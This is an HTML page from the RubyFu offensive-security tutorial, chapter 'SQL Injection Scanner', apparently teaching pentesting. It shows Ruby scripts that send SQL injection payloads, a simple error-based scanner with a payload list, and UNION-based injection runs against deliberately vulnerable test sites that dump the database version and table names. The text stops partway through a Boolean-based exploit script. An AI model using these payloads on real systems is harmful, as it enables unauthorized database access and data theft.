<!DOCTYPE HTML>
<html lang="en" >
    
    <head>
        
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <title>SQL Injection Scanner | RubyFu</title>
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <meta name="description" content="">
        <meta name="generator" content="GitBook 2.6.2">
        
        
        <meta name="HandheldFriendly" content="true"/>
        <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-status-bar-style" content="black">
        <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
        <link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
        
    <link rel="stylesheet" href="../gitbook/style.css">
    
        
        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
        
    
        
        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
        
    
        
        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
        
    
        
        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
        
    
        
        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
        
    
        
        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
        
    
    
        <link rel="stylesheet" href="../styles/website.css">
    

        
    
    
    <link rel="next" href="../module_0x4__web_kung_fu/databases.html" />
    
    
    <link rel="prev" href="../module_0x4__web_kung_fu/index.html" />
    

        <script type="text/javascript" src="../styles/header.js"></script>
    </head>
    <body>
        
        
    <div class="book"
        data-level="4.1"
        data-chapter-title="SQL Injection Scanner"
        data-filepath="module_0x4__web_kung_fu/sql_injection_scanner.md"
        data-basepath=".."
        data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
        data-innerlanguage="">
    

<div class="book-summary">
    <nav role="navigation">
        <ul class="summary">
            
            
            
            

            

            
    
        <li class="chapter " data-level="0" data-path="index.html">
            
                
                    <a href="../index.html">
                
                        <i class="fa fa-check"></i>
                        
                        Module 0x0 | Introduction
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="0.1" data-path="contribution.html">
            
                
                    <a href="../contribution.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>0.1.</b>
                        
                        Contribution
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="0.2" data-path="beginners.html">
            
                
                    <a href="../beginners.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>0.2.</b>
                        
                        Beginners
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="0.3" data-path="required_gems.html">
            
                
                    <a href="../required_gems.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>0.3.</b>
                        
                        Required Gems
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1" data-path="module_0x1__basic_ruby_kung_fu/index.html">
            
                
                    <a href="../module_0x1__basic_ruby_kung_fu/index.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>1.</b>
                        
                        Module 0x1 | Basic Ruby Kung Fu
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.1" data-path="module_0x1__basic_ruby_kung_fu/string.html">
            
                
                    <a href="../module_0x1__basic_ruby_kung_fu/string.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>1.1.</b>
                        
                        String
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.1.1" data-path="module_0x1__basic_ruby_kung_fu/conversion.html">
            
                
                    <a href="../module_0x1__basic_ruby_kung_fu/conversion.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>1.1.1.</b>
                        
                        Conversion
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="1.1.2" data-path="module_0x1__basic_ruby_kung_fu/extraction.html">
            
                
                    <a href="../module_0x1__basic_ruby_kung_fu/extraction.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>1.1.2.</b>
                        
                        Extraction
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.2" data-path="module_0x1__basic_ruby_kung_fu/array.html">
            
                
                    <a href="../module_0x1__basic_ruby_kung_fu/array.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>1.2.</b>
                        
                        Array
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="2" data-path="module_0x2__system_kung_fu/index.html">
            
                
                    <a href="../module_0x2__system_kung_fu/index.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>2.</b>
                        
                        Module 0x2 | System Kung Fu
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="2.1" data-path="module_0x2__system_kung_fu/command_execution.html">
            
                
                    <a href="../module_0x2__system_kung_fu/command_execution.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>2.1.</b>
                        
                        Command Execution
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="2.2" data-path="module_0x2__system_kung_fu/file_manipulation.html">
            
                
                    <a href="../module_0x2__system_kung_fu/file_manipulation.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>2.2.</b>
                        
                        File manipulation
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="2.2.1" data-path="module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
            
                
                    <a href="../module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>2.2.1.</b>
                        
                        Parsing HTML, XML, JSON
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="2.3" data-path="module_0x2__system_kung_fu/cryptography.html">
            
                
                    <a href="../module_0x2__system_kung_fu/cryptography.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>2.3.</b>
                        
                        Cryptography
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="2.4" data-path="module_0x2__system_kung_fu/system_shell.html">
            
                
                    <a href="../module_0x2__system_kung_fu/system_shell.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>2.4.</b>
                        
                        Remote Shell
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="2.4.1" data-path="module_0x2__system_kung_fu/ncatrb.html">
            
                
                    <a href="../module_0x2__system_kung_fu/ncatrb.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>2.4.1.</b>
                        
                        Ncat.rb
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="2.4.2" data-path="module_0x2__system_kung_fu/rce_as_a_service.html">
            
                
                    <a href="../module_0x2__system_kung_fu/rce_as_a_service.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>2.4.2.</b>
                        
                        RCE as a Service
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="2.5" data-path="module_0x2__system_kung_fu/virustotal.html">
            
                
                    <a href="../module_0x2__system_kung_fu/virustotal.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>2.5.</b>
                        
                        VirusTotal
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="3" data-path="module_0x3__network_kung_fu/index.html">
            
                
                    <a href="../module_0x3__network_kung_fu/index.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.</b>
                        
                        Module 0x3 | Network Kung Fu
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="3.1" data-path="module_0x3__network_kung_fu/ruby_socket.html">
            
                
                    <a href="../module_0x3__network_kung_fu/ruby_socket.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.1.</b>
                        
                        Ruby Socket
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="3.2" data-path="module_0x3__network_kung_fu/ssid_finder.html">
            
                
                    <a href="../module_0x3__network_kung_fu/ssid_finder.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.2.</b>
                        
                        SSID Finder
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="3.3" data-path="module_0x3__network_kung_fu/ftp.html">
            
                
                    <a href="../module_0x3__network_kung_fu/ftp.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.3.</b>
                        
                        FTP
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="3.4" data-path="module_0x3__network_kung_fu/ssh.html">
            
                
                    <a href="../module_0x3__network_kung_fu/ssh.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.4.</b>
                        
                        SSH
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="3.5" data-path="module_0x2__system_kung_fu/email.html">
            
                
                    <a href="../module_0x2__system_kung_fu/email.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.5.</b>
                        
                        Email
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="3.5.1" data-path="module_0x2__system_kung_fu/smtp_enumeration.html">
            
                
                    <a href="../module_0x2__system_kung_fu/smtp_enumeration.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.5.1.</b>
                        
                        SMTP Enumeration
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="3.6" data-path="module_0x3__network_kung_fu/network_scanning.html">
            
                
                    <a href="../module_0x3__network_kung_fu/network_scanning.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.6.</b>
                        
                        Network Scanning
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="3.6.1" data-path="module_0x3__network_kung_fu/nmap.html">
            
                
                    <a href="../module_0x3__network_kung_fu/nmap.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.6.1.</b>
                        
                        Nmap
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="3.7" data-path="module_0x3__network_kung_fu/dns.html">
            
                
                    <a href="../module_0x3__network_kung_fu/dns.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.7.</b>
                        
                        DNS
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="3.7.1" data-path="module_0x3__network_kung_fu/dns_enumeration.html">
            
                
                    <a href="../module_0x3__network_kung_fu/dns_enumeration.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.7.1.</b>
                        
                        DNS Enumeration
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="3.8" data-path="module_0x3__network_kung_fu/snmp_enumeration.html">
            
                
                    <a href="../module_0x3__network_kung_fu/snmp_enumeration.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.8.</b>
                        
                        SNMP Enumeration
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="3.9" data-path="module_0x3__network_kung_fu/tns_enumeration.html">
            
                
                    <a href="../module_0x3__network_kung_fu/tns_enumeration.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.9.</b>
                        
                        Oracle TNS Enumeration
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="3.10" data-path="module_0x3__network_kung_fu/packet_manipulation.html">
            
                
                    <a href="../module_0x3__network_kung_fu/packet_manipulation.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.10.</b>
                        
                        Packet manipulation
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="3.10.1" data-path="module_0x3__network_kung_fu/arp_spoofing.html">
            
                
                    <a href="../module_0x3__network_kung_fu/arp_spoofing.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.10.1.</b>
                        
                        ARP Spoofing
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="3.10.2" data-path="module_0x3__network_kung_fu/dns_spoofing.html">
            
                
                    <a href="../module_0x3__network_kung_fu/dns_spoofing.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>3.10.2.</b>
                        
                        DNS Spoofing
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="4" data-path="module_0x4__web_kung_fu/index.html">
            
                
                    <a href="../module_0x4__web_kung_fu/index.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>4.</b>
                        
                        Module 0x4 | Web Kung Fu
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter active" data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
            
                
                    <a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>4.1.</b>
                        
                        SQL Injection Scanner
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
            
                
                    <a href="../module_0x4__web_kung_fu/databases.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>4.2.</b>
                        
                        Databases
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
            
                
                    <a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>4.3.</b>
                        
                        Extending Burp Suite
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
            
                
                    <a href="../module_0x4__web_kung_fu/browser_manipulation.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>4.4.</b>
                        
                        Browser Manipulation
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
            
                
                    <a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>4.5.</b>
                        
                        Web Services and APIs
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
            
                
                    <a href="../module_0x4__web_kung_fu/web_services.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>4.5.1.</b>
                        
                        Interacting with Web Services
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
            
                
                    <a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>4.5.2.</b>
                        
                        Interacting with APIs
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
            
                
                    <a href="../module_0x4__web_kung_fu/wordpress_api.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>4.5.2.1.</b>
                        
                        WordPress API
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
            
                
                    <a href="../module_0x4__web_kung_fu/twitter_api.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>4.5.2.2.</b>
                        
                        Twitter API
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
            
                
                    <a href="../module_0x4__web_kung_fu/ruby2javascript.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>4.6.</b>
                        
                        Ruby 2 JavaScript
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
            
                
                    <a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>4.7.</b>
                        
                        Web Server and Proxy
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
            
                
                    <a href="../module_0x5__exploitation_kung_fu/index.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>5.</b>
                        
                        Module 0x5 | Exploitation Kung Fu
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
            
                
                    <a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>5.1.</b>
                        
                        Fuzzer
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
            
                
                    <a href="../module_0x5__exploitation_kung_fu/metasploit.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>5.2.</b>
                        
                        Metasploit
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
            
                
                    <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>5.2.1.</b>
                        
                        Auxiliary module
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
            
                
                    <a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>5.2.2.</b>
                        
                        Exploit module
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
            
                
                    <a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>5.2.3.</b>
                        
                        Meterpreter
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
            
                
                    <a href="../module_0x5__exploitation_kung_fu/extensions.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>5.2.3.1.</b>
                        
                        API and Extensions
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
            
                
                    <a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>5.2.3.2.</b>
                        
                        Meterpreter Scripting
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
            
                
                    <a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>5.2.3.3.</b>
                        
                        Railgun API Extension
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
            
                
                    <a href="../module_0x5__exploitation_kung_fu/metasm.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>5.3.</b>
                        
                        metasm
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
            
                
                    <a href="../module_0x6__forensic/index.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>6.</b>
                        
                        Module 0x6 | Forensic Kung Fu
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
            
                
                    <a href="../module_0x6__forensic/windows_forensic.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>6.1.</b>
                        
                        Windows Forensic
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
            
                
                    <a href="../module_0x6__forensic/android_forensic.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>6.2.</b>
                        
                        Android Forensic
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
            
                
                    <a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>6.3.</b>
                        
                        Network Traffic Analysis
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
            
                
                    <a href="../module_0x6__forensic/parsing_log_files.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>6.4.</b>
                        
                        Parsing Log Files
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="7" data-path="references/index.html">
            
                
                    <a href="../references/index.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>7.</b>
                        
                        References
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="8" data-path="faqs/index.html">
            
                
                    <a href="../faqs/index.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>8.</b>
                        
                        FAQs
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="9" data-path="contributors/index.html">
            
                
                    <a href="../contributors/index.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>9.</b>
                        
                        Contributors
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="9.1" data-path="contributors/todo.html">
            
                
                    <a href="../contributors/todo.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>9.1.</b>
                        
                        TODO
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    


            
            <li class="divider"></li>
            <li>
                <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
                    Published with GitBook
                </a>
            </li>
            
        </ul>
    </nav>
</div>

    <div class="book-body">
        <div class="body-inner">
            <div class="book-header" role="navigation">
    <!-- Actions Left -->
    

    <!-- Title -->
    <h1>
        <i class="fa fa-circle-o-notch fa-spin"></i>
        <a href="../" >RubyFu</a>
    </h1>
</div>

            <div class="page-wrapper" tabindex="-1" role="main">
                <div class="page-inner">
                
                
                    <section class="normal" id="section-">
                    
                        <h1 id="sql-injection-scanner"><a name="sql-injection-scanner" class="plugin-anchor" href="#sql-injection-scanner"><span class="fa fa-link"></span></a>SQL Injection Scanner</h1>
<h2 id="basic-sqli-script-as-command-line-browser"><a name="basic-sqli-script-as-command-line-browser" class="plugin-anchor" href="#basic-sqli-script-as-command-line-browser"><span class="fa fa-link"></span></a>Basic SQLi script as command line browser</h2>
<p>The is a very basic script take your given payload and send it to the vulnerable parameter and returns the response back to you. I&apos;ll use (<a href="http://testphp.vulnweb.com/" target="_blank">http://testphp.vulnweb.com/</a>) as it&apos;s legal to test.</p>
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
<span class="hljs-comment"># Send your payload from command line</span>
<span class="hljs-comment">#</span>
<span class="hljs-keyword">require</span> <span class="hljs-string">&quot;net/http&quot;</span>

<span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">2</span>
  puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> [IP ADDRESS] [PAYLOAD]&quot;</span>
  exit <span class="hljs-number">0</span>
<span class="hljs-keyword">else</span>
  host, payload = <span class="hljs-constant">ARGV</span>
<span class="hljs-keyword">end</span>

uri = <span class="hljs-constant">URI</span>.parse(<span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/artists.php?&quot;</span>)
uri.query = <span class="hljs-constant">URI</span>.encode_www_form({<span class="hljs-string">&quot;artist&quot;</span> =&gt; <span class="hljs-string">&quot;<span class="hljs-subst">#{payload}</span>&quot;</span>})
http = <span class="hljs-constant">Net::HTTP</span>.new(uri.host, uri.port)
http.use_ssl = <span class="hljs-keyword">true</span> <span class="hljs-keyword">if</span> uri.scheme == <span class="hljs-string">&apos;https&apos;</span>    <span class="hljs-comment"># Enable HTTPS support if it&apos;s HTTPS</span>
<span class="hljs-comment"># http.set_debug_output($stdout)</span>

request = <span class="hljs-constant">Net::HTTP::Get</span>.new(uri.request_uri)
response = http.request(request)
<span class="hljs-comment"># puts &quot;[+] Status code: &quot;+ response.code + &quot;\n\n&quot;</span>
<span class="hljs-comment"># puts response.body.gsub(/&lt;.*?&gt;/, &apos;&apos;).strip</span>
puts response.body.scan(<span class="hljs-regexp">/&lt;h2 id=&apos;pageName&apos;&gt;.*&lt;\/h2&gt;/</span>).join.gsub(<span class="hljs-regexp">/&lt;.*?&gt;/</span>, <span class="hljs-string">&apos;&apos;</span>).strip

puts <span class="hljs-string">&quot;&quot;</span>
</code></pre>
<blockquote>
<p>I&apos;ve commented the line <code>puts response.body.gsub(/&lt;.*?&gt;/, &apos;&apos;).strip</code> and added a custom regular expression to fix our target outputs.</p>
</blockquote>
<p>Let&apos;s to test it in action</p>
<pre><code>ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,NULL,NULL,NULL#&quot; | grep -i -e warning -e error
# =&gt; Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62

ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,NULL,NULL#&quot; | grep -i -e warning -e error
# =&gt; 

ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,@@VERSION,NULL#&quot;
# =&gt; artist: 5.1.73-0ubuntu0.10.04.1

ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,GROUP_CONCAT(table_name),NULL FROM information_schema.tables#&quot; 
# =&gt; artist: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
</code></pre><p>Here a very basic and simple SQL-injection solid scanner, develop it as far as you can!</p>
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
<span class="hljs-comment"># Very basic SQLi scanner!</span>
<span class="hljs-comment">#</span>
<span class="hljs-keyword">require</span> <span class="hljs-string">&apos;net/http&apos;</span>

<span class="hljs-comment"># Some SQLi payloads</span>
payloads =
    [
      <span class="hljs-string">&quot;&apos;&quot;</span>,
      <span class="hljs-string">&apos;&quot;&apos;</span>,
      <span class="hljs-string">&quot;&apos; or 1=2--+&quot;</span>
    ]

<span class="hljs-comment"># Some database error responses</span>
errors =
    {
      <span class="hljs-symbol">:mysql</span> =&gt; [
                 <span class="hljs-string">&quot;SQL.*syntax&quot;</span>,
                 <span class="hljs-string">&quot;mysql.*(fetch).*array&quot;</span>,
                 <span class="hljs-string">&quot;Warning&quot;</span>
                ],
      <span class="hljs-symbol">:mssql</span> =&gt; [
                 <span class="hljs-string">&quot;line.*[0-9]&quot;</span>,
                 <span class="hljs-string">&quot;Microsoft SQL Native Client error.*&quot;</span>
                ],
      <span class="hljs-symbol">:oracle</span> =&gt; [
                  <span class="hljs-string">&quot;.*ORA-[0-9].*&quot;</span>,
                  <span class="hljs-string">&quot;Warning&quot;</span>
                 ]
      }

<span class="hljs-comment"># Try a known vulnerable site</span>
uri  = <span class="hljs-constant">URI</span>.parse <span class="hljs-string">&quot;http://testphp.vulnweb.com/artists.php?artist=1&quot;</span>

<span class="hljs-comment"># Update the query with a payload</span>
uri.query += payloads[<span class="hljs-number">0</span>]

<span class="hljs-comment"># Send get request</span>
response = <span class="hljs-constant">Net::HTTP</span>.get uri

<span class="hljs-comment"># Search if an error occurred = vulnerable</span>
puts <span class="hljs-string">&quot;[+] The <span class="hljs-subst">#{<span class="hljs-constant">URL</span>.decode(uri.to_s)}</span> is vulnerable!&quot;</span> <span class="hljs-keyword">unless</span> response.match(<span class="hljs-regexp">/<span class="hljs-subst">#{errors[<span class="hljs-symbol">:mysql</span>][<span class="hljs-number">0</span>]}</span>/i</span>).<span class="hljs-keyword">nil</span>?
</code></pre>
<p>Try it on this URL (<a href="http://testasp.vulnweb.com/showforum.asp?id=0" target="_blank">http://testasp.vulnweb.com/showforum.asp?id=0</a>)</p>
<p>Results</p>
<pre><code>ruby sqli.rb http://testasp.vulnweb.com/showforum.asp?id=0
[+] The http://testphp.vulnweb.com/artists.php?artist=1&apos; is vulnerable!
</code></pre><h2 id="booleanbases-sqli-exploit-script"><a name="booleanbases-sqli-exploit-script" class="plugin-anchor" href="#booleanbases-sqli-exploit-script"><span class="fa fa-link"></span></a>Boolean-bases SQLi Exploit Script</h2>
<p>Here is a Boolean-based SQLi exploit for <a href="https://github.com/Audi-1/sqli-labs" target="_blank">sqli-labs</a> vulnerable application.</p>
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
<span class="hljs-comment"># Boolean-based SQLi exploit</span>
<span class="hljs-comment"># Sabri Saleh | <span class="hljs-doctag">@KINGSABRI</span></span>
<span class="hljs-comment">#</span>
<span class="hljs-keyword">require</span> <span class="hljs-string">&apos;open-uri&apos;</span>

<span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">1</span>
  puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> &lt;IP ADDRESS&gt;&quot;</span>
  exit <span class="hljs-number">0</span>
<span class="hljs-keyword">else</span>
  host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>]
<span class="hljs-keyword">end</span>

<span class="hljs-comment"># Just colorizing outputs</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">String</span></span>
